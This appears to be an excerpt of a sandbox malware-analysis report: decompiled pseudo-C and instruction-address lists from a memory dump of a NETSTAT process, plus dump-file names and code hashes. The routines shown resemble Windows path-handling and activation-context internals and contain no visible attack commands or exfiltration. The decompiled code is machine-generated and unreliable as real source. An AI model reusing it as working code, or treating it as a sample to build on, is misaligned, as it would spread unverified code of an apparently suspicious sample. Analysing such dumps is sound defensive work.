                													_t395 = (_t393 & 0x000000ff) - _t427;
                													__eflags = _t395;
                													if(_t395 == 0) {
                														_t511 = _t511 +  *_t469;
                														__eflags = _t511;
                													} else {
                														_t398 = _t395 - 1;
                														__eflags = _t398;
                														if(_t398 == 0) {
                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                														} else {
                															__eflags = _t398 == 1;
                															if(_t398 == 1) {
                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                																_t402 =  *_t469 & 0x0000ffff;
                																 *(_t528 - 0xac) = _t402;
                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                															}
                														}
                													}
                													__eflags = _t511 -  *(_t528 - 0xe4);
                													if(_t511 <  *(_t528 - 0xe4)) {
                														break;
                													}
                													_t397 =  *(_t528 - 0x88) + 1;
                													 *(_t528 - 0x88) = _t397;
                													_t469 = _t469 + 0x10;
                													__eflags = _t397 -  *(_t528 + 0x1c);
                													_t392 =  *(_t528 - 0xa2);
                													if(_t397 <  *(_t528 + 0x1c)) {
                														continue;
                													}
                													goto L45;
                												}
                												_t475 = 0x216;
                												 *(_t528 - 0x74) = 0x216;
                												goto L45;
                											}
                										} else {
                											asm("lock dec dword [eax+ecx*8+0x4]");
                											goto L16;
                										}
                									}
                									_t491 = E03424CAB(_t306, _t528 - 0xa4);
                									 *(_t528 - 0x74) = _t491;
                									__eflags = _t491;
                									if(_t491 != 0) {
                										goto L91;
                									} else {
                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                										goto L20;
                									}
                								}
                								L16:
                								 *(_t528 - 0x74) = 0x1069;
                								L93:
                								_t298 =  *(_t528 - 0xd0) + 1;
                								 *(_t528 - 0xd0) = _t298;
                								_t474 = _t474 + _t511;
                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                								_t494 = 4;
                								__eflags = _t298 - _t494;
                								if(_t298 >= _t494) {
                									goto L100;
                								}
                								_t494 =  *(_t528 - 0xcc);
                								_t435 = _t298;
                								continue;
                							}
                							__eflags = _t494[2] | _t494[3];
                							if((_t494[2] | _t494[3]) == 0) {
                								goto L15;
                							}
                							goto L12;
                						}
                						__eflags = _t301;
                						if(_t301 != 0) {
                							goto L92;
                						}
                						goto L10;
                						L92:
                						goto L93;
                					}
                				} else {
                					_push(0x57);
                					L101:
                					return E033AD130(_t427, _t494, _t511);
                				}
                			}
                0x0342638c
                0x03426392
                0x034263a1
                0x034263a7
                0x034263af
                0x034263af
                0x034263bd
                0x034263d8
                0x00000000
                0x034263d8
                0x03425fac
                0x03425fb2
                0x03425fb4
                0x03425fbd
                0x03425fc6
                0x03425fce
                0x03425fd4
                0x03425fdc
                0x03425fec
                0x03425fed
                0x03425fee
                0x03425fef
                0x03425ff9
                0x03425ffa
                0x03425ffb
                0x03425ffc
                0x03426000
                0x03426004
                0x03426012
                0x03426012
                0x03426018
                0x03426019
                0x0342601a
                0x0342601b
                0x0342601c
                0x03426020
                0x03426059
                0x0342605c
                0x03426061
                0x03426061
                0x03426022
                0x03426022
                0x03426022
                0x03426025
                0x0342602a
                0x0342602b
                0x03426031
                0x03426037
                0x03426038
                0x0342603e
                0x03426048
                0x03426049
                0x0342604a
                0x0342604b
                0x0342604c
                0x0342604d
                0x03426053
                0x03426054
                0x03426054
                0x03426062
                0x03426065
                0x03426067
                0x0342606a
                0x03426070
                0x03426075
                0x03426076
                0x03426081
                0x03426087
                0x03426095
                0x03426099
                0x0342609e
                0x034260a4
                0x034260ae
                0x034260b0
                0x034260b3
                0x034260b6
                0x034260b8
                0x034260ba
                0x034260ba
                0x034260ba
                0x034260ba
                0x034260be
                0x034260c0
                0x034260c5
                0x034260c5
                0x034260c5
                0x034260c6
                0x034260cd
                0x03426114
                0x034260cf
                0x034260cf
                0x034260d4
                0x034260d5
                0x034260da
                0x034260db
                0x034260e1
                0x034260e2
                0x034260e8
                0x034260f8
                0x034260fd
                0x034260fe
                0x03426102
                0x03426104
                0x03426107
                0x03426109
                0x0342610b
                0x0342610b
                0x0342610b
                0x0342610b
                0x0342610f
                0x0342610f
                0x03426117
                0x0342611a
                0x0342611f
                0x03426125
                0x03426134
                0x03426139
                0x0342613f
                0x03426146
                0x03426148
                0x0342614b
                0x0342614d
                0x0342614f
                0x0342614f
                0x0342614f
                0x0342614f
                0x03426153
                0x03426159
                0x03426159
                0x0342615c
                0x03426163
                0x03426169
                0x0342616c
                0x03426172
                0x03426181
                0x03426186
                0x03426187
                0x0342618b
                0x03426191
                0x03426195
                0x034261a3
                0x034261bb
                0x034261c0
                0x034261c3
                0x034261cc
                0x034261d0
                0x034261dc
                0x034261de
                0x034261e1
                0x034261e4
                0x034261e6
                0x034261e8
                0x034261e8
                0x034261e8
                0x034261e8
                0x034261e6
                0x034261ec
                0x034261f3
                0x03426203
                0x03426209
                0x0342620a
                0x03426216
                0x0342621d
                0x03426227
                0x03426241
                0x03426246
                0x0342624c
                0x03426257
                0x03426259
                0x0342625c
                0x0342625e
                0x03426260
                0x03426260
                0x03426260
                0x03426260
                0x0342625e
                0x03426264
                0x03426267
                0x03426269
                0x03426315
                0x03426315
                0x0342631b
                0x0342631e
                0x03426324
                0x03426327
                0x0342632f
                0x03426330
                0x03426333
                0x0342633a
                0x0342633c
                0x03426335
                0x03426335
                0x03426335
                0x0342633f
                0x03426342
                0x0342634c
                0x03426352
                0x03426355
                0x03426355
                0x03426359
                0x00000000
                0x0342626f
                0x03426275
                0x03426275
                0x03426278
                0x0342627e
                0x0342627e
                0x03426281
                0x03426287
                0x0342628d
                0x03426298
                0x0342629c
                0x034262a2
                0x0342629e
                0x0342629e
                0x0342629e
                0x034262a7
                0x034262a7
                0x034262aa
                0x034262b0
                0x034262f0
                0x034262f0
                0x034262f2
                0x034262f8
                0x034262fd
                0x034262b2
                0x034262b2
                0x034262b2
                0x034262b5
                0x034262dd
                0x034262e2
                0x034262e5
                0x034262b7
                0x034262b8
                0x034262bb
                0x034262bd
                0x034262c0
                0x034262c4
                0x034262cd
                0x034262cd
                0x034262c0
                0x034262bb
                0x034262b5
                0x03426302
                0x03426303
                0x03426305
                0x03426305
                0x03426305
                0x0342630c
                0x0342630c
                0x00000000
                0x0342627e
                0x03426269
                0x03425eac
                0x03425ebb
                0x03425ebe
                0x03425ecb
                0x03425ecb
                0x03425ece
                0x03425ece
                0x03425ed4
                0x03425ed7
                0x03425ed9
                0x03425edb
                0x03425edb
                0x03425ee1
                0x03425ee1
                0x03425ee3
                0x03425f20
                0x03425f20
                0x03425ee5
                0x03425ee5
                0x03425ee5
                0x03425ee8
                0x03425f11
                0x03425f18
                0x03425eea
                0x03425eea
                0x03425eed
                0x03425ef2
                0x03425ef8
                0x03425efb
                0x03425f0a
                0x03425f0a
                0x03425eed
                0x03425ee8
                0x03425f22
                0x03425f28
                0x00000000
                0x00000000
                0x03425f30
                0x03425f31
                0x03425f37
                0x03425f3a
                0x03425f3d
                0x03425f44
                0x00000000
                0x00000000
                0x00000000
                0x03425f46
                0x03425f48
                0x03425f4d
                0x00000000
                0x03425f4d
                0x03425dda
                0x03425ddf
                0x00000000
                0x03425ddf
                0x03425dd8
                0x03425da7
                0x03425da9
                0x03425dac
                0x03425dae
                0x00000000
                0x03425db4
                0x03425db4
                0x00000000
                0x03425db4
                0x03425dae
                0x03425d88
                0x03425d8d
                0x03426363
                0x03426369
                0x0342636a
                0x03426370
                0x03426372
                0x0342637a
                0x0342637b
                0x0342637d
                0x00000000
                0x00000000
                0x0342637f
                0x03426385
                0x00000000
                0x03426385
                0x03425d38
                0x03425d3b
                0x00000000
                0x00000000
                0x00000000
                0x03425d3b
                0x03425d27
                0x03425d29
                0x00000000
                0x00000000
                0x00000000
                0x03426360
                0x00000000
                0x03426360
                0x03425c10
                0x03425c10
                0x034263da
                0x034263e5
                0x034263e5

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9343ab7c4f8e4948386855166b638714f6e09220bcdb07d5570868f2270ff559
                • Instruction ID: 026bdc5fff552ee47a5cce2282b105fae1c360b6029441b4bbfd19ed5ed3272e
                • Opcode Fuzzy Hash: 9343ab7c4f8e4948386855166b638714f6e09220bcdb07d5570868f2270ff559
                • Instruction Fuzzy Hash: F5423875900229CFDB24CF68C880BAAFBB1BF49304F5981EAD859EB342D7749985CF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E03374120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                				signed int _v8;
                				void* _v20;
                				signed int _v24;
                				char _v532;
                				char _v540;
                				signed short _v544;
                				signed int _v548;
                				signed short* _v552;
                				signed short _v556;
                				signed short* _v560;
                				signed short* _v564;
                				signed short* _v568;
                				void* _v570;
                				signed short* _v572;
                				signed short _v576;
                				signed int _v580;
                				char _v581;
                				void* _v584;
                				unsigned int _v588;
                				signed short* _v592;
                				void* _v597;
                				void* _v600;
                				void* _v604;
                				void* _v609;
                				void* _v616;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				unsigned int _t161;
                				signed int _t162;
                				unsigned int _t163;
                				void* _t169;
                				signed short _t173;
                				signed short _t177;
                				signed short _t181;
                				unsigned int _t182;
                				signed int _t185;
                				signed int _t213;
                				signed int _t225;
                				short _t233;
                				signed char _t234;
                				signed int _t242;
                				signed int _t243;
                				signed int _t244;
                				signed int _t245;
                				signed int _t250;
                				void* _t251;
                				signed short* _t254;
                				void* _t255;
                				signed int _t256;
                				void* _t257;
                				signed short* _t260;
                				signed short _t265;
                				signed short* _t269;
                				signed short _t271;
                				signed short** _t272;
                				signed short* _t275;
                				signed short _t282;
                				signed short _t283;
                				signed short _t290;
                				signed short _t299;
                				signed short _t307;
                				signed int _t308;
                				signed short _t311;
                				signed short* _t315;
                				signed short _t316;
                				void* _t317;
                				void* _t319;
                				signed short* _t321;
                				void* _t322;
                				void* _t323;
                				unsigned int _t324;
                				signed int _t325;
                				void* _t326;
                				signed int _t327;
                				signed int _t329;
                
                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                				_v8 =  *0x344d360 ^ _t329;
                				_t157 = _a8;
                				_t321 = _a4;
                				_t315 = __edx;
                				_v548 = __ecx;
                				_t305 = _a20;
                				_v560 = _a12;
                				_t260 = _a16;
                				_v564 = __edx;
                				_v580 = _a8;
                				_v572 = _t260;
                				_v544 = _a20;
                				if( *__edx <= 8) {
                					L3:
                					if(_t260 != 0) {
                						 *_t260 = 0;
                					}
                					_t254 =  &_v532;
                					_v588 = 0x208;
                					if((_v548 & 0x00000001) != 0) {
                						_v556 =  *_t315;
                						_v552 = _t315[2];
                						_t161 = E0338F232( &_v556);
                						_t316 = _v556;
                						_v540 = _t161;
                						goto L17;
                					} else {
                						_t306 = 0x208;
                						_t298 = _t315;
                						_t316 = E03376E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                						if(_t316 == 0) {
                							L68:
                							_t322 = 0xc0000033;
                							goto L39;
                						} else {
                							while(_v581 == 0) {
                								_t233 = _v588;
                								if(_t316 > _t233) {
                									_t234 = _v548;
                									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                										_t254 = L03374620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                										if(_t254 == 0) {
                											_t169 = 0xc0000017;
                										} else {
                											_t298 = _v564;
                											_v588 = _t316;
                											_t306 = _t316;
                											_t316 = E03376E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                											if(_t316 != 0) {
                												continue;
                											} else {
                												goto L68;
                											}
                										}
                									} else {
                										goto L90;
                									}
                								} else {
                									_v556 = _t316;
                									 *((short*)(_t329 + 0x32)) = _t233;
                									_v552 = _t254;
                									if(_t316 < 2) {
                										L11:
                										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                											_t161 = 5;
                										} else {
                											if(_t316 < 6) {
                												L87:
                												_t161 = 3;
                											} else {
                												_t242 = _t254[2] & 0x0000ffff;
                												if(_t242 != 0x5c) {
                													if(_t242 == 0x2f) {
                														goto L16;
                													} else {
                														goto L87;
                													}
                													goto L101;
                												} else {
                													L16:
                													_t161 = 2;
                												}
                											}
                										}
                									} else {
                										_t243 =  *_t254 & 0x0000ffff;
                										if(_t243 == 0x5c || _t243 == 0x2f) {
                											if(_t316 < 4) {
                												L81:
                												_t161 = 4;
                												goto L17;
                											} else {
                												_t244 = _t254[1] & 0x0000ffff;
                												if(_t244 != 0x5c) {
                													if(_t244 == 0x2f) {
                														goto L60;
                													} else {
                														goto L81;
                													}
                												} else {
                													L60:
                													if(_t316 < 6) {
                														L83:
                														_t161 = 1;
                														goto L17;
                													} else {
                														_t245 = _t254[2] & 0x0000ffff;
                														if(_t245 != 0x2e) {
                															if(_t245 == 0x3f) {
                																goto L62;
                															} else {
                																goto L83;
                															}
                														} else {
                															L62:
                															if(_t316 < 8) {
                																L85:
                																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                																goto L17;
                															} else {
                																_t250 = _t254[3] & 0x0000ffff;
                																if(_t250 != 0x5c) {
                																	if(_t250 == 0x2f) {
                																		goto L64;
                																	} else {
                																		goto L85;
                																	}
                																} else {
                																	L64:
                																	_t161 = 6;
                																	goto L17;
                																}
                															}
                														}
                													}
                												}
                											}
                											goto L101;
                										} else {
                											goto L11;
                										}
                									}
                									L17:
                									if(_t161 != 2) {
                										_t162 = _t161 - 1;
                										if(_t162 > 5) {
                											goto L18;
                										} else {
                											switch( *((intOrPtr*)(_t162 * 4 +  &M033745F8))) {
                												case 0:
                													_v568 = 0x3331078;
                													__eax = 2;
                													goto L20;
                												case 1:
                													goto L18;
                												case 2:
                													_t163 = 4;
                													goto L19;
                											}
                										}
                										goto L41;
                									} else {
                										L18:
                										_t163 = 0;
                										L19:
                										_v568 = 0x33311c4;
                									}
                									L20:
                									_v588 = _t163;
                									_v564 = _t163 + _t163;
                									_t306 =  *_v568 & 0x0000ffff;
                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                									_v576 = _t265;
                									if(_t265 > 0xfffe) {
                										L90:
                										_t322 = 0xc0000106;
                									} else {
                										if(_t321 != 0) {
                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                												if(_v580 != 0) {
                													goto L23;
                												} else {
                													_t322 = 0xc0000106;
                													goto L39;
                												}
                											} else {
                												_t177 = _t306;
                												goto L25;
                											}
                											goto L101;
                										} else {
                											if(_v580 == _t321) {
                												_t322 = 0xc000000d;
                											} else {
                												L23:
                												_t173 = L03374620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                												_t269 = _v592;
                												_t269[2] = _t173;
                												if(_t173 == 0) {
                													_t322 = 0xc0000017;
                												} else {
                													_t316 = _v556;
                													 *_t269 = 0;
                													_t321 = _t269;
                													_t269[1] = _v576;
                													_t177 =  *_v568 & 0x0000ffff;
                													L25:
                													_v580 = _t177;
                													if(_t177 == 0) {
                														L29:
                														_t307 =  *_t321 & 0x0000ffff;
                													} else {
                														_t290 =  *_t321 & 0x0000ffff;
                														_v576 = _t290;
                														_t310 = _t177 & 0x0000ffff;
                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                															_t307 =  *_t321 & 0xffff;
                														} else {
                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                															E0339F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                															_t329 = _t329 + 0xc;
                															_t311 = _v580;
                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                															 *_t321 = _t225;
                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                															}
                															goto L29;
                														}
                													}
                													_t271 = _v556 - _v588 + _v588;
                													_v580 = _t307;
                													_v576 = _t271;
                													if(_t271 != 0) {
                														_t308 = _t271 & 0x0000ffff;
                														_v588 = _t308;
                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                															E0339F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                															_t329 = _t329 + 0xc;
                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                															 *_t321 = _t213;
                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                															}
                														}
                													}
                													_t272 = _v560;
                													if(_t272 != 0) {
                														 *_t272 = _t321;
                													}
                													_t306 = 0;
                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                													_t275 = _v572;
                													if(_t275 != 0) {
                														_t306 =  *_t275;
                														if(_t306 != 0) {
                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                														}
                													}
                													_t181 = _v544;
                													if(_t181 != 0) {
                														 *_t181 = 0;
                														 *((intOrPtr*)(_t181 + 4)) = 0;
                														 *((intOrPtr*)(_t181 + 8)) = 0;
                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                														if(_v540 == 5) {
                															_t182 = E033552A5(1);
                															_v588 = _t182;
                															if(_t182 == 0) {
                																E0336EB70(1, 0x34479a0);
                																goto L38;
                															} else {
                																_v560 = _t182 + 0xc;
                																_t185 = E0336AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                																if(_t185 == 0) {
                																	_t324 = _v588;
                																	goto L97;
                																} else {
                																	_t306 = _v544;
                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                																	 *(_t306 + 4) = _t282;
                																	_v576 = _t282;
                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                																	 *_t306 = _t325;
                																	if( *_t282 == 0x5c) {
                																		_t149 = _t325 - 2; // -2
                																		_t283 = _t149;
                																		 *_t306 = _t283;
                																		 *(_t306 + 4) = _v576 + 2;
                																		_t185 = _t283 & 0x0000ffff;
                																	}
                																	_t324 = _v588;
                																	 *(_t306 + 2) = _t185;
                																	if((_v548 & 0x00000002) == 0) {
                																		L97:
                																		asm("lock xadd [esi], eax");
                																		if((_t185 | 0xffffffff) == 0) {
                																			_push( *((intOrPtr*)(_t324 + 4)));
                																			E033995D0();
                																			L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                																		}
                																	} else {
                																		 *(_t306 + 0xc) = _t324;
                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                																	}
                																	goto L38;
                																}
                															}
                															goto L41;
                														}
                													}
                													L38:
                													_t322 = 0;
                												}
                											}
                										}
                									}
                									L39:
                									if(_t254 !=  &_v532) {
                										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                									}
                									_t169 = _t322;
                								}
                								goto L41;
                							}
                							goto L68;
                						}
                					}
                					L41:
                					_pop(_t317);
                					_pop(_t323);
                					_pop(_t255);
                					return E0339B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                				} else {
                					_t299 = __edx[2];
                					if( *_t299 == 0x5c) {
                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                						if(_t256 != 0x5c) {
                							if(_t256 != 0x3f) {
                								goto L2;
                							} else {
                								goto L50;
                							}
                						} else {
                							L50:
                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                								goto L2;
                							} else {
                								_t251 = E03393D43(_t315, _t321, _t157, _v560, _v572, _t305);
                								_pop(_t319);
                								_pop(_t326);
                								_pop(_t257);
                								return E0339B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                							}
                						}
                					} else {
                						L2:
                						_t260 = _v572;
                						goto L3;
                					}
                				}
                				L101:
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3640270ba1c275abd33e38f211e73e398cee22d09e657ee789d304ad99035c93
                • Instruction ID: a05a6d8573fc16e305e19f55fc69a9184e4feb77abf82ed4dee8bb285d0e23d3
                • Opcode Fuzzy Hash: 3640270ba1c275abd33e38f211e73e398cee22d09e657ee789d304ad99035c93
                • Instruction Fuzzy Hash: 69F17C74A083118BC724DF1AC8C0A7AB7F5BF88754F19496EF586CB650E738E891CB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E033820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                				signed int _v16;
                				signed int _v20;
                				signed char _v24;
                				intOrPtr _v28;
                				signed int _v32;
                				void* _v36;
                				char _v48;
                				signed int _v52;
                				signed int _v56;
                				unsigned int _v60;
                				char _v64;
                				unsigned int _v68;
                				signed int _v72;
                				char _v73;
                				signed int _v74;
                				char _v75;
                				signed int _v76;
                				void* _v81;
                				void* _v82;
                				void* _v89;
                				void* _v92;
                				void* _v97;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed char _t128;
                				void* _t129;
                				signed int _t130;
                				void* _t132;
                				signed char _t133;
                				intOrPtr _t135;
                				signed int _t137;
                				signed int _t140;
                				signed int* _t144;
                				signed int* _t145;
                				intOrPtr _t146;
                				signed int _t147;
                				signed char* _t148;
                				signed int _t149;
                				signed int _t153;
                				signed int _t169;
                				signed int _t174;
                				signed int _t180;
                				void* _t197;
                				void* _t198;
                				signed int _t201;
                				intOrPtr* _t202;
                				intOrPtr* _t205;
                				signed int _t210;
                				signed int _t215;
                				signed int _t218;
                				signed char _t221;
                				signed int _t226;
                				char _t227;
                				signed int _t228;
                				void* _t229;
                				unsigned int _t231;
                				void* _t235;
                				signed int _t240;
                				signed int _t241;
                				void* _t242;
                				signed int _t246;
                				signed int _t248;
                				signed int _t252;
                				signed int _t253;
                				void* _t254;
                				intOrPtr* _t256;
                				intOrPtr _t257;
                				unsigned int _t262;
                				signed int _t265;
                				void* _t267;
                				signed int _t275;
                
                				_t198 = __ebx;
                				_t267 = (_t265 & 0xfffffff0) - 0x48;
                				_v68 = __ecx;
                				_v73 = 0;
                				_t201 = __edx & 0x00002000;
                				_t128 = __edx & 0xffffdfff;
                				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                				_v72 = _t128;
                				if((_t128 & 0x00000008) != 0) {
                					__eflags = _t128 - 8;
                					if(_t128 != 8) {
                						L69:
                						_t129 = 0xc000000d;
                						goto L23;
                					} else {
                						_t130 = 0;
                						_v72 = 0;
                						_v75 = 1;
                						L2:
                						_v74 = 1;
                						_t226 =  *0x3448714; // 0x0
                						if(_t226 != 0) {
                							__eflags = _t201;
                							if(_t201 != 0) {
                								L62:
                								_v74 = 1;
                								L63:
                								_t130 = _t226 & 0xffffdfff;
                								_v72 = _t130;
                								goto L3;
                							}
                							_v74 = _t201;
                							__eflags = _t226 & 0x00002000;
                							if((_t226 & 0x00002000) == 0) {
                								goto L63;
                							}
                							goto L62;
                						}
                						L3:
                						_t227 = _v75;
                						L4:
                						_t240 = 0;
                						_v56 = 0;
                						_t252 = _t130 & 0x00000100;
                						if(_t252 != 0 || _t227 != 0) {
                							_t240 = _v68;
                							_t132 = E03382EB0(_t240);
                							__eflags = _t132 - 2;
                							if(_t132 != 2) {
                								__eflags = _t132 - 1;
                								if(_t132 == 1) {
                									goto L25;
                								}
                								__eflags = _t132 - 6;
                								if(_t132 == 6) {
                									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                									if( *((short*)(_t240 + 4)) != 0x3f) {
                										goto L40;
                									}
                									_t197 = E03382EB0(_t240 + 8);
                									__eflags = _t197 - 2;
                									if(_t197 == 2) {
                										goto L25;
                									}
                								}
                								L40:
                								_t133 = 1;
                								L26:
                								_t228 = _v75;
                								_v56 = _t240;
                								__eflags = _t133;
                								if(_t133 != 0) {
                									__eflags = _t228;
                									if(_t228 == 0) {
                										L43:
                										__eflags = _v72;
                										if(_v72 == 0) {
                											goto L8;
                										}
                										goto L69;
                									}
                									_t133 = E033558EC(_t240);
                									_t221 =  *0x3445cac; // 0x16
                									__eflags = _t221 & 0x00000040;
                									if((_t221 & 0x00000040) != 0) {
                										_t228 = 0;
                										__eflags = _t252;
                										if(_t252 != 0) {
                											goto L43;
                										}
                										_t133 = _v72;
                										goto L7;
                									}
                									goto L43;
                								} else {
                									_t133 = _v72;
                									goto L6;
                								}
                							}
                							L25:
                							_t133 = _v73;
                							goto L26;
                						} else {
                							L6:
                							_t221 =  *0x3445cac; // 0x16
                							L7:
                							if(_t133 != 0) {
                								__eflags = _t133 & 0x00001000;
                								if((_t133 & 0x00001000) != 0) {
                									_t133 = _t133 | 0x00000a00;
                									__eflags = _t221 & 0x00000004;
                									if((_t221 & 0x00000004) != 0) {
                										_t133 = _t133 | 0x00000400;
                									}
                								}
                								__eflags = _t228;
                								if(_t228 != 0) {
                									_t133 = _t133 | 0x00000100;
                								}
                								_t229 = E03394A2C(0x3446e40, 0x3394b30, _t133, _t240);
                								__eflags = _t229;
                								if(_t229 == 0) {
                									_t202 = _a20;
                									goto L100;
                								} else {
                									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                									L15:
                									_t202 = _a20;
                									 *_t202 = _t135;
                									if(_t229 == 0) {
                										L100:
                										 *_a4 = 0;
                										_t137 = _a8;
                										__eflags = _t137;
                										if(_t137 != 0) {
                											 *_t137 = 0;
                										}
                										 *_t202 = 0;
                										_t129 = 0xc0000017;
                										goto L23;
                									} else {
                										_t242 = _a16;
                										if(_t242 != 0) {
                											_t254 = _t229;
                											memcpy(_t242, _t254, 0xd << 2);
                											_t267 = _t267 + 0xc;
                											_t242 = _t254 + 0x1a;
                										}
                										_t205 = _a4;
                										_t25 = _t229 + 0x48; // 0x48
                										 *_t205 = _t25;
                										_t140 = _a8;
                										if(_t140 != 0) {
                											__eflags =  *((char*)(_t267 + 0xa));
                											if( *((char*)(_t267 + 0xa)) != 0) {
                												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                											} else {
                												 *_t140 = 0;
                											}
                										}
                										_t256 = _a12;
                										if(_t256 != 0) {
                											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                										}
                										_t257 =  *_t205;
                										_v48 = 0;
                										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                										_v56 = 0;
                										_v52 = 0;
                										_t144 =  *( *[fs:0x30] + 0x50);
                										if(_t144 != 0) {
                											__eflags =  *_t144;
                											if( *_t144 == 0) {
                												goto L20;
                											}
                											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                											goto L21;
                										} else {
                											L20:
                											_t145 = 0x7ffe0384;
                											L21:
                											if( *_t145 != 0) {
                												_t146 =  *[fs:0x30];
                												__eflags =  *(_t146 + 0x240) & 0x00000004;
                												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                													_t147 = E03377D50();
                													__eflags = _t147;
                													if(_t147 == 0) {
                														_t148 = 0x7ffe0385;
                													} else {
                														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                													}
                													__eflags =  *_t148 & 0x00000020;
                													if(( *_t148 & 0x00000020) != 0) {
                														_t149 = _v72;
                														__eflags = _t149;
                														if(__eflags == 0) {
                															_t149 = 0x3335c80;
                														}
                														_push(_t149);
                														_push( &_v48);
                														 *((char*)(_t267 + 0xb)) = E0338F6E0(_t198, _t242, _t257, __eflags);
                														_push(_t257);
                														_push( &_v64);
                														_t153 = E0338F6E0(_t198, _t242, _t257, __eflags);
                														__eflags =  *((char*)(_t267 + 0xb));
                														if( *((char*)(_t267 + 0xb)) != 0) {
                															__eflags = _t153;
                															if(_t153 != 0) {
                																__eflags = 0;
                																E033D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                																L03372400(_t267 + 0x20);
                															}
                															L03372400( &_v64);
                														}
                													}
                												}
                											}
                											_t129 = 0;
                											L23:
                											return _t129;
                										}
                									}
                								}
                							}
                							L8:
                							_t275 = _t240;
                							if(_t275 != 0) {
                								_v73 = 0;
                								_t253 = 0;
                								__eflags = 0;
                								L29:
                								_push(0);
                								_t241 = E03382397(_t240);
                								__eflags = _t241;
                								if(_t241 == 0) {
                									_t229 = 0;
                									L14:
                									_t135 = 0;
                									goto L15;
                								}
                								__eflags =  *((char*)(_t267 + 0xb));
                								 *(_t241 + 0x34) = 1;
                								if( *((char*)(_t267 + 0xb)) != 0) {
                									E03372280(_t134, 0x3448608);
                									__eflags =  *0x3446e48 - _t253; // 0xb38880
                									if(__eflags != 0) {
                										L48:
                										_t253 = 0;
